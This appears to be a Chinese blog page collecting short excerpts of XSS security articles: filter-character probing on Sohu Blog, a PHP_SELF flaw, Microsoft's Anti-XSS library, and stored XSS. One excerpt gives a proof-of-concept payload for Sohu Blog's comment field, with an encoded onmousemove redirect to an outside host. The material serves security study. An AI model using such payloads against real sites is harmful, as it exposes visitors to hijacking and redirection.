大西瓜的杂货铺

来自互联网，原始出处不详。

XSS wrom网站如何实现入侵?不说废话，且看怎么实现，我先拿SOHU BLOG做示范。

1. 测试过滤字符，下面都是构造XSS所需要的关键字符(未包含全角字符，空格是个TABLE，\/前是真正的空格)，在个人档案处看过滤了哪些。

’’;:!–”<javascript JAvaSCriPT>=&#{()} \/

结果

’’;:!–”=&#{()} // (&后是amp，论坛过滤了)

阅读全文

现在的web服务器和开发工具虽然不会再出现像asp的%81那样明显的漏洞了，但是由于开发人员的疏忽和各种语言特性组合造成的一些奇异的漏洞仍然会存在。今天偶然读到的XSS Woes，就详细讲述了和$_SERVER[’PHP_SELF’]相关的一个危险漏洞。
$_SERVER[’PHP_SELF’]在开发的时候常会用到，一般用来引用当前网页地址，并且它是系统自动生成的全局变量，也会有什么问题么？让我们先看看下面的代码吧：
<form action=”<?php echo $_SERVER[’PHP_SELF’]; ?>”>
<input type=”submit” name=”submit” value=http://www.hack58.net//Article/html/3/7/2009/”submit” />
</form>
这段代码非常简单，我们想用$_SERVER[’PHP_SELF’]来让网页提交时提交到它自己，假设代码文件名为test.php，在执行的时候就一定会得到我们期望的地址么？首先试试地址http://…/test.php，结果当然是没有问题的啦，别着急，你再访问一下http://…/test.php/a=1，将会得到如下客户端代码：  

阅读全文

From：web应用安全观察站

MS Anti-XSS Lib实在是一个非常好的工具库，从3.0版本开始就内含了一个SRE(Security Runtime Engine)，SRE实现为一个HttpModule。

现在3.1版本也发布了，主要是做了性能优化以及改进的SRE功能，提供了两个新的安全方法

• 1. GetSafeHtml
  2. GetSafeHtmlFragment

     阅读全文

Author: jianxin [80sec]
EMail: jianxin#80sec.com
Site: http://www.80sec.com
Date: 2008-12-24
From: http://www.80sec.com/release/xss-how-to-root.txt

[ 目录 ]

0×00 前言
0×01 xss渗透测试基本思路
0×02 一次黑盒的xss渗透测试
0×03 一次白盒的xss渗透测试
0×04 总结

阅读全文

From:tomkeeper

如果把浏览器看作WEB2.0后时代的操作系统，那么客户端脚本就相当于传统的应用程序，而XSS的攻击方式其实就相当于在被攻击者的系统上执行了一个木马程序。但这种“木马”有个很大的缺点，就是无法像传统木马那样在操作系统中安家，以后还能自动执行。

前几个月发现了一种有趣的XSS漏洞，这种漏洞攻击一次后XSS代码就会被存储下来，以后每次访问被XSS的网站这个“木马”都会再自动执行。我在网上没有找到相关的资料，这里姑且称之为“存储型XSS”（如果有朋友之前看到过类似的文档，欢迎指教）。

阅读全文

From:空虚浪子

by kxlzx inbreak.net

ps：感谢鬼仔’blog，XEYE’s blog协助测试。

实际上是个XSS漏洞。

POC：

XML/HTML代码

1. 在评论的网址一栏，填写
3. http://blog.sohu.com/fh8e3333211134333/f8e9wjfidsj3332dfs’ onmousemove=’location.href=String.fromCharCode(104,116,116,112,58,47,47,105,110,98,114,101,97,107,46,110,101,116,47,97,46,112,104,112);

这段代码仅供测试，是不能直接用的。

阅读全文